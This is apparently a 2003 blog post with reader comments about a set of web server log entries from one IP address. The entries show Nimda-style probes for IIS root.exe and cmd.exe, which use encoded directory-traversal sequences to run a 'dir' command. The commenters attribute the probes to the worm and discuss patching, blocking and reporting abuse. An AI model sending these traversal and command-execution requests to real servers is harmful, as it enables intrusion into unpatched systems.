Script kiddies.. so inefficient
Wouldn't it be quicker and easier to query the server first? It's not windows.. such a waste of bandwidth.. (probably not their own anyway, but still).
24.91.103.152 "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284
24.91.103.152 "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 282
24.91.103.152 "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
24.91.103.152 "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
24.91.103.152 "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
24.91.103.152 "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
24.91.103.152 "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
24.91.103.152 "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
24.91.103.152 "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
24.91.103.152 "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
24.91.103.152 "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
24.91.103.152 "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
24.91.103.152 "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289
24.91.103.152 "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289
24.91.103.152 "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
24.91.103.152 "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
Comments
We have these too, at quite regular intervals. Had to laugh first time I saw it. Best was one week-end where they tried every three hours or so.
But I have seen people try out even more stupid things. Especially nice when the 'Script Kiddies' don't using IP-masquerading or some-such mechanism.
Posted by: Yashima | April 20, 2003 11:03 AM
Those log entries are most like the result of a visit from your friendly neighborhood Nimda worm variant. No script kiddies at all.
Posted by: joat | April 20, 2003 11:07 AM
Hehe, I get these all the time. Probably a worm as joat says, or a bot that's scanning the web for vulnerable servers.
Posted by: Baba | April 20, 2003 11:50 AM
What blows my mind is that there are still people out there who haven't patched their systems that are STILL infected with nimda. Though the probes have slowed down for me a bit lately. I actually got a code red one just yesterday.
Posted by: gregory | April 20, 2003 04:50 PM
I still see at least one probe a day from others within the Verizon DSL netblock. *sigh*
Posted by: Jon | April 21, 2003 12:11 PM
You have to love those children who just have to run a web server from home...
bash-2.05a$ nslookup 24.91.103.152
Server: athena.int.no.la.us.xxx-xxx.xxx
Address: 10.0.0.1
Name: h0030f11433a7.ne.client2.attbi.com
Address: 24.91.103.152
It's so easy, anyone can just fire up web services on their XP box... >:|
Some people need to be schooled (yeah, I know, before you say anything) in proper webserver software.... *cough* Apache *cough*
Did you refer the little bugger's IP and all the logs to ATT Abuse?
-J
Posted by: bad-magic-number, aka Jeremy | April 21, 2003 02:33 PM
Yep - just Nimda making the rounds. Instead of seeing those in my logs over and over again, I just chose to alias root.exe to a script that disallows further access to the webserver.
Posted by: Damon | April 21, 2003 10:10 PM
Would it make sense to fake a success? Perhaps this could be used to hinder further proceedings? Or what would happen if you give it a server redirect to itself? Self-Attack??? >:)
Posted by: Gerald | April 23, 2003 10:50 AM
Hey! I'm running a webserver from home. I'm not sure if my ISP likes it, but meh. Glad someone said nimda, I've been reporting the buggers.
I think the difference is that I'm running OpenBSD. I refuse to run A pachy server, instead thttpd works fine. 1-800-COMCAST... here I go again.
Posted by: David | October 2, 2003 03:02 AM